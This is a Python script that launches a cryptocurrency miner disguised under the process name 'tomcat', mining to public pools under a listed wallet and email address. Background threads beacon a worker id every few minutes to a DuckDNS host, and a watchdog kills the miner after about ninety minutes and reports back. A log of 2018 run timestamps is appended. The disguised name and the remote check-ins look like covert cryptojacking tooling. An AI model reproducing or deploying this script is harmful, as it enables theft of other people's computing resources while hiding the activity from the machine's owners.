import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:05.876138
#2018-02-17 15:57:04.081051
#2018-02-17 17:45:08.446012
#2018-02-17 19:33:06.803330
#2018-02-17 21:22:05.986151
#2018-02-17 23:06:08.438323
#2018-02-18 00:53:04.943486
#2018-02-18 02:41:04.956493
#2018-02-18 04:29:04.219981
#2018-02-18 06:21:04.512859
#2018-02-18 08:10:04.295793
#2018-02-18 09:57:03.738973
#2018-02-18 11:44:05.794001
#2018-02-18 13:29:04.083295
#2018-02-18 15:19:01.770315
#2018-02-18 17:08:06.204107
#2018-02-18 18:56:05.376084
#2018-02-18 20:42:07.251304
#2018-02-18 22:27:05.518164
#2018-02-19 00:16:07.142833
#2018-02-19 02:02:07.901872
#2018-02-19 03:49:04.362705
#2018-02-19 05:34:01.966979
#2018-02-19 07:22:05.505541
#2018-02-19 09:12:02.199826
#2018-02-19 11:02:01.620942
#2018-02-19 12:48:06.573875
#2018-02-19 14:35:05.297953
#2018-02-19 16:22:07.918669
#2018-02-19 18:09:09.097190
#2018-02-19 19:58:06.547719
#2018-02-19 21:46:05.363515
#2018-02-19 23:31:08.473524
#2018-02-20 01:16:07.449226
#2018-02-20 03:07:07.879256
#2018-02-20 04:54:06.232665
#2018-02-20 06:37:07.872103
#2018-02-20 08:22:05.136248
#2018-02-20 10:07:04.245533
#2018-02-20 11:51:02.219129
#2018-02-20 13:39:05.237992
#2018-02-20 15:22:08.906378
#2018-02-20 17:08:05.123326
#2018-02-20 18:54:11.302173
#2018-02-20 20:45:01.416640
#2018-02-20 22:31:07.707738
#2018-02-21 00:12:08.660668
#2018-02-21 01:58:05.031114
#2018-02-21 03:46:06.424104
#2018-02-21 05:34:05.080221
#2018-02-21 07:22:06.927544
#2018-02-21 09:07:07.929003
#2018-02-21 10:56:01.637118
#2018-02-21 12:43:10.047204
#2018-02-21 14:30:10.428404
#2018-02-21 16:18:06.500295
#2018-02-21 18:08:07.202810
#2018-02-21 19:55:10.854087
#2018-02-21 21:41:05.327382
#2018-02-21 23:28:05.808693
#2018-02-22 01:17:05.805126
#2018-02-22 03:08:03.539798
#2018-02-22 04:53:04.352219
#2018-02-22 06:40:05.754264
#2018-02-22 08:28:06.865185
#2018-02-22 10:15:07.881474
#2018-02-22 12:00:09.856183
#2018-02-22 13:46:05.952909
#2018-02-22 15:34:07.345559
#2018-02-22 17:20:03.839641
#2018-02-22 19:07:05.678220
#2018-02-22 20:59:05.500268
#2018-02-22 22:45:09.604057
#2018-02-23 00:34:01.785974
#2018-02-23 02:20:05.000378
#2018-02-23 04:09:07.667429
#2018-02-23 05:55:02.715879
#2018-02-23 07:35:07.428101
#2018-02-23 09:38:03.971060
#2018-02-23 11:42:01.516958
#2018-02-23 13:32:05.520424
#2018-02-23 15:19:05.963377
#2018-02-23 17:06:09.401236
#2018-02-23 18:36:05.142803
#2018-02-23 20:17:01.579404
#2018-02-23 21:49:01.300224
#2018-02-23 23:27:06.604550
#2018-02-24 01:05:08.313932
#2018-02-24 02:44:06.751089
#2018-02-24 04:22:06.354822
#2018-02-24 05:48:07.022057
#2018-02-24 07:24:04.039767
#2018-02-24 08:57:03.330530
#2018-02-24 10:28:07.020910
#2018-02-24 12:12:02.141542
#2018-02-24 13:41:01.749020
#2018-02-24 15:12:06.363920
#2018-02-24 16:46:05.945858
#2018-02-24 18:20:09.393144
#2018-02-24 19:50:07.304633
#2018-02-24 21:24:01.695614
#2018-02-24 23:43:01.513873
#2018-02-25 02:04:06.071024
#2018-02-25 05:50:01.275452
#2018-02-25 11:37:06.479912